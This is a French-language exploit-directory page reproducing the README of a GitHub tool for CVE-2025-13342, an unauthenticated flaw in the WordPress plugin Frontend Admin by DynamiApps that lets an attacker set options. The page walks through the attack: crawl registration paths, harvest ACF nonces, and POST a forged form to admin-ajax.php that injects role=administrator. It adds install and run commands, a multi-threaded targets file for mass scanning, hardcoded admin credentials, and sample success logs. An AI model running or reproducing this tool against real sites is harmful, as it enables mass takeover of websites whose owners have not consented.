Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-13342 — Frontend Admin by DynamiApps <= 3.28.20 - Mise à jour arbitraire d'options non authentifiée | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-13342
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubnxploited/cve-2025-13342

CVE-2025-13342

Frontend Admin by DynamiApps <= 3.28.20 - Mise à jour arbitraire d'options non authentifiée

Voir le dépôt
1il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-13342

Frontend Admin par DynamiApps <= 3.28.20 - Mise à jour arbitraire non authentifiée des options

⚡ CVE-2025-13342

Frontend Admin par DynamiApps — Création non authentifiée d'un administrateur

root@kitploit:~
   __         __    _  _  _  ___    ,________     _
  / ()(|  |_// ()  / )/ \/ )|__    /| __/ __/|  |/ )
 |     |  |  >- ----/|   |/    \----|   \   \|__|_/
  \___/ \/   \___/ /__\_//__\__/    |\__/\__/   |/__

CVE CVSS Plugin Auth

Python

◈ Vulnérabilité

ChampDétail
Identifiant CVECVE-2025-13342
Score9.8 CRITIQUE — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
AffectéFrontend Admin par DynamiApps ≤ 3.28.20
AuthentificationAucune — entièrement non authentifié
TypeVérification insuffisante des capacités + validation des entrées → écriture arbitraire d'options
CWECWE-284 · Contrôle d'accès inapproprié

Ce qui se passe :
Le gestionnaire de sauvegarde ActionOptions::run() ne vérifie ni les capacités de l'utilisateur ni les entrées avant d'écrire dans wp_options. Un formulaire front-end ACF public devient un canal d'écriture ouvert. L'attaquant définit users_can_register=1 et default_role=administrator, puis enregistre un nouveau compte qui reçoit automatiquement le rôle Administrateur.

Cet outil contourne cette approche en deux étapes — il soumet directement la charge utile de formulaire forgée avec role=administrator injecté dans les champs de création d'utilisateur via acff[user][field_*], créant un compte administrateur en un seul appel AJAX.


◈ Comment fonctionne l'exploit

root@kitploit:~
1. Crawl common registration paths  →  locate ACF frontend form
2. Parse hidden fields               →  _acf_nonce, _acf_form
3. Map user fields                   →  username · email · password · role
4. POST /wp-admin/admin-ajax.php
   action=frontend_admin/form_submit
   acff[user][<role_field>] = administrator
5. {"success":true}  →  admin account created
6. Log to acf_success.txt

◈ Prérequis

root@kitploit:~
requests
beautifulsoup4
colorama
rich
root@kitploit:~
pip install requests beautifulsoup4 colorama rich

◈ Installation et exécution

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-13342.git
cd CVE-2025-13342
pip install -r requirements.txt
python3 CVE-2025-13342.py

◈ Utilisation

L'outil est interactif. Quatre questions vous seront posées :

root@kitploit:~
Targets file path    →  list.txt
Threads              →  10
Timeout (seconds)    →  10
Verbose debug        →  y / N

Les identifiants sont définis en interne :

ChampValeur
Nom d'utilisateurNxadmin1
E-mail[email protected]
Mot de passeNxAdmin_1337#KSA

◈ Fichier des cibles

Un hôte par ligne — schéma optionnel :

root@kitploit:~
https://target1.com
target2.com
http://target3.com

◈ Chemins d'inscription scannés

L'outil sonde 28 chemins par cible, dans l'ordre, et s'arrête au premier formulaire ACF valide :

root@kitploit:~
/  /register/  /registration/  /signup/  /sign-up/
/user-registration/  /account/  /my-account/
/frontend-form/  /frontend-register/  ...

◈ Sortie

FichierContenu
acf_success.txtCréations d'administrateurs réussies confirmées

Format :

root@kitploit:~
[2025-06-01 14:30:22] BASE=https://target.com FORM=https://target.com/register/
USER=Nxadmin1 [email protected] PASS=NxAdmin_1337#KSA JSON={"success":true,...}

Terminal :

root@kitploit:~
[+] Target base:  https://target.com
[+] Found form at: https://target.com/register/
    _acf_nonce:  a1b2c3d4e5
    _acf_form:   123
[+] SUCCESS:  https://target.com

[-] No suitable ACF Frontend form found on ...
[-] FAILED: https://target2.com

◈ Contact

AuteurNxploited (Khaled Alenazi)
GitHubgithub.com/Nxploited
Telegram@KNxploited

◈ Avertissement

Cet outil est fourni uniquement pour la recherche en sécurité autorisée et à des fins pédagogiques.
L'auteur décline toute responsabilité en cas d'utilisation contre des systèmes sans autorisation écrite explicite du propriétaire.
L'accès non autorisé est illégal en vertu du CFAA, du CMA et des lois équivalentes dans le monde entier.
Vous êtes seul responsable de vos actions.


© 2025 Nxploited · Frontend Admin par DynamiApps ≤ 3.28.20 · Corrigé dans la version 3.28.21
Télécharger l’outil